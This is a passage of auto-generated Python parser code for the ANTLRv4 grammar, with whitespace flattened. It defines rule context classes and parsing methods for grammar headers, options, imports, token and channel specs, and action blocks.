return self.getTypedRuleContext(ANTLRv4Parser.RulesContext,0)
def EOF(self):
return self.getToken(ANTLRv4Parser.EOF, 0)
def grammarType(self):
return self.getTypedRuleContext(ANTLRv4Parser.GrammarTypeContext,0)
def identifier(self):
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
def prequelConstruct(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.PrequelConstructContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.PrequelConstructContext,i)
def modeSpec(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.ModeSpecContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.ModeSpecContext,i)
def DOC_COMMENT(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.DOC_COMMENT)
else:
return self.getToken(ANTLRv4Parser.DOC_COMMENT, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_grammarSpec
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterGrammarSpec" ):
listener.enterGrammarSpec(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitGrammarSpec" ):
listener.exitGrammarSpec(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitGrammarSpec" ):
return visitor.visitGrammarSpec(self)
else:
return visitor.visitChildren(self)
def grammarSpec(self):
localctx = ANTLRv4Parser.GrammarSpecContext(self, self._ctx, self.state)
self.enterRule(localctx, 0, self.RULE_grammarSpec)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 125
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.DOC_COMMENT:
self.state = 122
localctx._DOC_COMMENT = self.match(ANTLRv4Parser.DOC_COMMENT)
localctx.docs.append(localctx._DOC_COMMENT)
self.state = 127
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 128
localctx.gtype = self.grammarType()
self.state = 129
localctx.gname = self.identifier()
self.state = 130
self.match(ANTLRv4Parser.SEMI)
self.state = 134
self._errHandler.sync(self)
_la = self._input.LA(1)
while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.OPTIONS) | (1 << ANTLRv4Parser.TOKENS) | (1 << ANTLRv4Parser.CHANNELS) | (1 << ANTLRv4Parser.IMPORT) | (1 << ANTLRv4Parser.AT))) != 0):
self.state = 131
self.prequelConstruct()
self.state = 136
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 137
self.rules()
self.state = 141
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.MODE:
self.state = 138
self.modeSpec()
self.state = 143
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 144
self.match(ANTLRv4Parser.EOF)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class GrammarTypeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def LEXER(self):
return self.getToken(ANTLRv4Parser.LEXER, 0)
def GRAMMAR(self):
return self.getToken(ANTLRv4Parser.GRAMMAR, 0)
def PARSER(self):
return self.getToken(ANTLRv4Parser.PARSER, 0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_grammarType
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterGrammarType" ):
listener.enterGrammarType(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitGrammarType" ):
listener.exitGrammarType(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitGrammarType" ):
return visitor.visitGrammarType(self)
else:
return visitor.visitChildren(self)
def grammarType(self):
localctx = ANTLRv4Parser.GrammarTypeContext(self, self._ctx, self.state)
self.enterRule(localctx, 2, self.RULE_grammarType)
try:
self.enterOuterAlt(localctx, 1)
self.state = 151
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.LEXER]:
self.state = 146
self.match(ANTLRv4Parser.LEXER)
self.state = 147
self.match(ANTLRv4Parser.GRAMMAR)
pass
elif token in [ANTLRv4Parser.PARSER]:
self.state = 148
self.match(ANTLRv4Parser.PARSER)
self.state = 149
self.match(ANTLRv4Parser.GRAMMAR)
pass
elif token in [ANTLRv4Parser.GRAMMAR]:
self.state = 150
self.match(ANTLRv4Parser.GRAMMAR)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class PrequelConstructContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def optionsSpec(self):
return self.getTypedRuleContext(ANTLRv4Parser.OptionsSpecContext,0)
def delegateGrammars(self):
return self.getTypedRuleContext(ANTLRv4Parser.DelegateGrammarsContext,0)
def tokensSpec(self):
return self.getTypedRuleContext(ANTLRv4Parser.TokensSpecContext,0)
def channelsSpec(self):
return self.getTypedRuleContext(ANTLRv4Parser.ChannelsSpecContext,0)
def action(self):
return self.getTypedRuleContext(ANTLRv4Parser.ActionContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_prequelConstruct
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPrequelConstruct" ):
listener.enterPrequelConstruct(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPrequelConstruct" ):
listener.exitPrequelConstruct(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitPrequelConstruct" ):
return visitor.visitPrequelConstruct(self)
else:
return visitor.visitChildren(self)
def prequelConstruct(self):
localctx = ANTLRv4Parser.PrequelConstructContext(self, self._ctx, self.state)
self.enterRule(localctx, 4, self.RULE_prequelConstruct)
try:
self.state = 158
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.OPTIONS]:
self.enterOuterAlt(localctx, 1)
self.state = 153
self.optionsSpec()
pass
elif token in [ANTLRv4Parser.IMPORT]:
self.enterOuterAlt(localctx, 2)
self.state = 154
self.delegateGrammars()
pass
elif token in [ANTLRv4Parser.TOKENS]:
self.enterOuterAlt(localctx, 3)
self.state = 155
self.tokensSpec()
pass
elif token in [ANTLRv4Parser.CHANNELS]:
self.enterOuterAlt(localctx, 4)
self.state = 156
self.channelsSpec()
pass
elif token in [ANTLRv4Parser.AT]:
self.enterOuterAlt(localctx, 5)
self.state = 157
self.action()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class OptionsSpecContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def OPTIONS(self):
return self.getToken(ANTLRv4Parser.OPTIONS, 0)
def RBRACE(self):
return self.getToken(ANTLRv4Parser.RBRACE, 0)
def option(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.OptionContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.OptionContext,i)
def SEMI(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.SEMI)
else:
return self.getToken(ANTLRv4Parser.SEMI, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_optionsSpec
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOptionsSpec" ):
listener.enterOptionsSpec(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOptionsSpec" ):
listener.exitOptionsSpec(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitOptionsSpec" ):
return visitor.visitOptionsSpec(self)
else:
return visitor.visitChildren(self)
def optionsSpec(self):
localctx = ANTLRv4Parser.OptionsSpecContext(self, self._ctx, self.state)
self.enterRule(localctx, 6, self.RULE_optionsSpec)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 160
self.match(ANTLRv4Parser.OPTIONS)
self.state = 166
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.TOKEN_REF or _la==ANTLRv4Parser.RULE_REF:
self.state = 161
self.option()
self.state = 162
self.match(ANTLRv4Parser.SEMI)
self.state = 168
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 169
self.match(ANTLRv4Parser.RBRACE)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class OptionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self.name = None # IdentifierContext
self.value = None # OptionValueContext
def ASSIGN(self):
return self.getToken(ANTLRv4Parser.ASSIGN, 0)
def identifier(self):
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
def optionValue(self):
return self.getTypedRuleContext(ANTLRv4Parser.OptionValueContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_option
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterOption" ):
listener.enterOption(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitOption" ):
listener.exitOption(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitOption" ):
return visitor.visitOption(self)
else:
return visitor.visitChildren(self)
def option(self):
localctx = ANTLRv4Parser.OptionContext(self, self._ctx, self.state)
self.enterRule(localctx, 8, self.RULE_option)
try:
self.enterOuterAlt(localctx, 1)
self.state = 171
localctx.name = self.identifier()
self.state = 172
self.match(ANTLRv4Parser.ASSIGN)
self.state = 173
localctx.value = self.optionValue()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class OptionValueContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return ANTLRv4Parser.RULE_optionValue
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class StringOptionContext(OptionValueContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.OptionValueContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def STRING_LITERAL(self):
return self.getToken(ANTLRv4Parser.STRING_LITERAL, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterStringOption" ):
listener.enterStringOption(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitStringOption" ):
listener.exitStringOption(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitStringOption" ):
return visitor.visitStringOption(self)
else:
return visitor.visitChildren(self)
class IntOptionContext(OptionValueContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.OptionValueContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def INT(self):
return self.getToken(ANTLRv4Parser.INT, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIntOption" ):
listener.enterIntOption(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIntOption" ):
listener.exitIntOption(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitIntOption" ):
return visitor.visitIntOption(self)
else:
return visitor.visitChildren(self)
class ActionOptionContext(OptionValueContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.OptionValueContext
super().__init__(parser)
self.value = None # ActionBlockContext
self.copyFrom(ctx)
def actionBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.ActionBlockContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterActionOption" ):
listener.enterActionOption(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitActionOption" ):
listener.exitActionOption(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitActionOption" ):
return visitor.visitActionOption(self)
else:
return visitor.visitChildren(self)
class PathOptionContext(OptionValueContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.OptionValueContext
super().__init__(parser)
self._identifier = None # IdentifierContext
self.value = list() # of IdentifierContexts
self.copyFrom(ctx)
def identifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.IdentifierContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,i)
def DOT(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.DOT)
else:
return self.getToken(ANTLRv4Parser.DOT, i)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPathOption" ):
listener.enterPathOption(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPathOption" ):
listener.exitPathOption(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitPathOption" ):
return visitor.visitPathOption(self)
else:
return visitor.visitChildren(self)
def optionValue(self):
localctx = ANTLRv4Parser.OptionValueContext(self, self._ctx, self.state)
self.enterRule(localctx, 10, self.RULE_optionValue)
self._la = 0 # Token type
try:
self.state = 186
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF]:
localctx = ANTLRv4Parser.PathOptionContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 175
localctx._identifier = self.identifier()
localctx.value.append(localctx._identifier)
self.state = 180
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.DOT:
self.state = 176
self.match(ANTLRv4Parser.DOT)
self.state = 177
localctx._identifier = self.identifier()
localctx.value.append(localctx._identifier)
self.state = 182
self._errHandler.sync(self)
_la = self._input.LA(1)
pass
elif token in [ANTLRv4Parser.STRING_LITERAL]:
localctx = ANTLRv4Parser.StringOptionContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 183
localctx.value = self.match(ANTLRv4Parser.STRING_LITERAL)
pass
elif token in [ANTLRv4Parser.BEGIN_ACTION]:
localctx = ANTLRv4Parser.ActionOptionContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 184
localctx.value = self.actionBlock()
pass
elif token in [ANTLRv4Parser.INT]:
localctx = ANTLRv4Parser.IntOptionContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 185
localctx.value = self.match(ANTLRv4Parser.INT)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class DelegateGrammarsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def IMPORT(self):
return self.getToken(ANTLRv4Parser.IMPORT, 0)
def delegateGrammar(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.DelegateGrammarContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.DelegateGrammarContext,i)
def SEMI(self):
return self.getToken(ANTLRv4Parser.SEMI, 0)
def COMMA(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.COMMA)
else:
return self.getToken(ANTLRv4Parser.COMMA, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_delegateGrammars
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDelegateGrammars" ):
listener.enterDelegateGrammars(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDelegateGrammars" ):
listener.exitDelegateGrammars(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitDelegateGrammars" ):
return visitor.visitDelegateGrammars(self)
else:
return visitor.visitChildren(self)
def delegateGrammars(self):
localctx = ANTLRv4Parser.DelegateGrammarsContext(self, self._ctx, self.state)
self.enterRule(localctx, 12, self.RULE_delegateGrammars)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 188
self.match(ANTLRv4Parser.IMPORT)
self.state = 189
self.delegateGrammar()
self.state = 194
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.COMMA:
self.state = 190
self.match(ANTLRv4Parser.COMMA)
self.state = 191
self.delegateGrammar()
self.state = 196
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 197
self.match(ANTLRv4Parser.SEMI)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class DelegateGrammarContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self.value = None # IdentifierContext
def identifier(self):
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_delegateGrammar
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDelegateGrammar" ):
listener.enterDelegateGrammar(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDelegateGrammar" ):
listener.exitDelegateGrammar(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitDelegateGrammar" ):
return visitor.visitDelegateGrammar(self)
else:
return visitor.visitChildren(self)
def delegateGrammar(self):
localctx = ANTLRv4Parser.DelegateGrammarContext(self, self._ctx, self.state)
self.enterRule(localctx, 14, self.RULE_delegateGrammar)
try:
self.enterOuterAlt(localctx, 1)
self.state = 199
localctx.value = self.identifier()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class TokensSpecContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self.defs = None # IdListContext
def TOKENS(self):
return self.getToken(ANTLRv4Parser.TOKENS, 0)
def RBRACE(self):
return self.getToken(ANTLRv4Parser.RBRACE, 0)
def idList(self):
return self.getTypedRuleContext(ANTLRv4Parser.IdListContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_tokensSpec
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTokensSpec" ):
listener.enterTokensSpec(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTokensSpec" ):
listener.exitTokensSpec(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitTokensSpec" ):
return visitor.visitTokensSpec(self)
else:
return visitor.visitChildren(self)
def tokensSpec(self):
localctx = ANTLRv4Parser.TokensSpecContext(self, self._ctx, self.state)
self.enterRule(localctx, 16, self.RULE_tokensSpec)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 201
self.match(ANTLRv4Parser.TOKENS)
self.state = 203
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.TOKEN_REF or _la==ANTLRv4Parser.RULE_REF:
self.state = 202
localctx.defs = self.idList()
self.state = 205
self.match(ANTLRv4Parser.RBRACE)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ChannelsSpecContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def CHANNELS(self):
return self.getToken(ANTLRv4Parser.CHANNELS, 0)
def RBRACE(self):
return self.getToken(ANTLRv4Parser.RBRACE, 0)
def idList(self):
return self.getTypedRuleContext(ANTLRv4Parser.IdListContext,0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_channelsSpec
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterChannelsSpec" ):
listener.enterChannelsSpec(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitChannelsSpec" ):
listener.exitChannelsSpec(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitChannelsSpec" ):
return visitor.visitChannelsSpec(self)
else:
return visitor.visitChildren(self)
def channelsSpec(self):
localctx = ANTLRv4Parser.ChannelsSpecContext(self, self._ctx, self.state)
self.enterRule(localctx, 18, self.RULE_channelsSpec)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 207
self.match(ANTLRv4Parser.CHANNELS)
self.state = 209
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.TOKEN_REF or _la==ANTLRv4Parser.RULE_REF:
self.state = 208
self.idList()
self.state = 211
self.match(ANTLRv4Parser.RBRACE)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class IdListContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self._identifier = None # IdentifierContext
self.defs = list() # of IdentifierContexts
def identifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.IdentifierContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,i)
def COMMA(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.COMMA)
else:
return self.getToken(ANTLRv4Parser.COMMA, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_idList
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIdList" ):
listener.enterIdList(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIdList" ):
listener.exitIdList(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitIdList" ):
return visitor.visitIdList(self)
else:
return visitor.visitChildren(self)
def idList(self):
localctx = ANTLRv4Parser.IdListContext(self, self._ctx, self.state)
self.enterRule(localctx, 20, self.RULE_idList)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 213
localctx._identifier = self.identifier()
localctx.defs.append(localctx._identifier)
self.state = 218
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,11,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
self.state = 214
self.match(ANTLRv4Parser.COMMA)
self.state = 215
localctx._identifier = self.identifier()
localctx.defs.append(localctx._identifier)
self.state = 220
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,11,self._ctx)
self.state = 222
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.COMMA:
self.state = 221
self.match(ANTLRv4Parser.COMMA)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ActionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def AT(self):
return self.getToken(ANTLRv4Parser.AT, 0)
def identifier(self):
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
def actionBlock(self):
return self.getTypedRuleContext(ANTLRv4Parser.ActionBlockContext,0)
def actionScopeName(self):
return self.getTypedRuleContext(ANTLRv4Parser.ActionScopeNameContext,0)
def COLONCOLON(self):
return self.getToken(ANTLRv4Parser.COLONCOLON, 0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_action
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAction" ):
listener.enterAction(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAction" ):
listener.exitAction(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAction" ):
return visitor.visitAction(self)
else:
return visitor.visitChildren(self)
def action(self):
localctx = ANTLRv4Parser.ActionContext(self, self._ctx, self.state)
self.enterRule(localctx, 22, self.RULE_action)
try:
self.enterOuterAlt(localctx, 1)
self.state = 224
self.match(ANTLRv4Parser.AT)
self.state = 228
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,13,self._ctx)
if la_ == 1:
self.state = 225
self.actionScopeName()
self.state = 226
self.match(ANTLRv4Parser.COLONCOLON)
self.state = 230
self.identifier()
self.state = 231
self.actionBlock()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ActionScopeNameContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self):
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
def LEXER(self):
return self.getToken(ANTLRv4Parser.LEXER, 0)
def PARSER(self):
return self.getToken(ANTLRv4Parser.PARSER, 0)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_actionScopeName
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterActionScopeName" ):
listener.enterActionScopeName(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitActionScopeName" ):
listener.exitActionScopeName(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitActionScopeName" ):
return visitor.visitActionScopeName(self)
else:
return visitor.visitChildren(self)
def actionScopeName(self):
localctx = ANTLRv4Parser.ActionScopeNameContext(self, self._ctx, self.state)
self.enterRule(localctx, 24, self.RULE_actionScopeName)
try:
self.state = 236
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF]:
self.enterOuterAlt(localctx, 1)
self.state = 233
self.identifier()
pass
elif token in [ANTLRv4Parser.LEXER]:
self.enterOuterAlt(localctx, 2)
self.state = 234
self.match(ANTLRv4Parser.LEXER)
pass
elif token in [ANTLRv4Parser.PARSER]:
self.enterOuterAlt(localctx, 3)
self.state = 235
self.match(ANTLRv4Parser.PARSER)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ActionBlockContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def BEGIN_ACTION(self):
return self.getToken(ANTLRv4Parser.BEGIN_ACTION, 0)
def END_ACTION(self):
return self.getToken(ANTLRv4Parser.END_ACTION, 0)
def ACTION_CONTENT(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.ACTION_CONTENT)
else:
return self.getToken(ANTLRv4Parser.ACTION_CONTENT, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_actionBlock
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterActionBlock" ):
listener.enterActionBlock(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitActionBlock" ):
listener.exitActionBlock(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitActionBlock" ):
return visitor.visitActionBlock(self)
else:
return visitor.visitChildren(self)
def actionBlock(self):
localctx = ANTLRv4Parser.ActionBlockContext(self, self._ctx, self.state)
self.enterRule(localctx, 26, self.RULE_actionBlock)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 238
self.match(ANTLRv4Parser.BEGIN_ACTION)
self.state = 242
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.ACTION_CONTENT:
self.state = 239
self.match(ANTLRv4Parser.ACTION_CONTENT)
self.state = 244
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 245
self.match(ANTLRv4Parser.END_ACTION)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ArgActionBlockContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def BEGIN_ARGUMENT(self):
return self.getToken(ANTLRv4Parser.BEGIN_ARGUMENT, 0)
def END_ARGUMENT(self):
return self.getToken(ANTLRv4Parser.END_ARGUMENT, 0)
def ARGUMENT_CONTENT(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.ARGUMENT_CONTENT)
else:
return self.getToken(ANTLRv4Parser.ARGUMENT_CONTENT, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_argActionBlock
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterArgActionBlock" ):
listener.enterArgActionBlock(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitArgActionBlock" ):
listener.exitArgActionBlock(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitArgActionBlock" ):
return visitor.visitArgActionBlock(self)
else:
return visitor.visitChildren(self)
def argActionBlock(self):
localctx = ANTLRv4Parser.ArgActionBlockContext(self, self._ctx, self.state)
self.enterRule(localctx, 28, self.RULE_argActionBlock)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 247
self.match(ANTLRv4Parser.BEGIN_ARGUMENT)
self.state = 251
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.ARGUMENT_CONTENT:
self.state = 248
self.match(ANTLRv4Parser.ARGUMENT_CONTENT)
self.state = 253
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 254
self.match(ANTLRv4Parser.END_ARGUMENT)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ModeSpecContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def MODE(self):
return self.getToken(ANTLRv4Parser.MODE, 0)
def identifier(self):
return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
def SEMI(self):
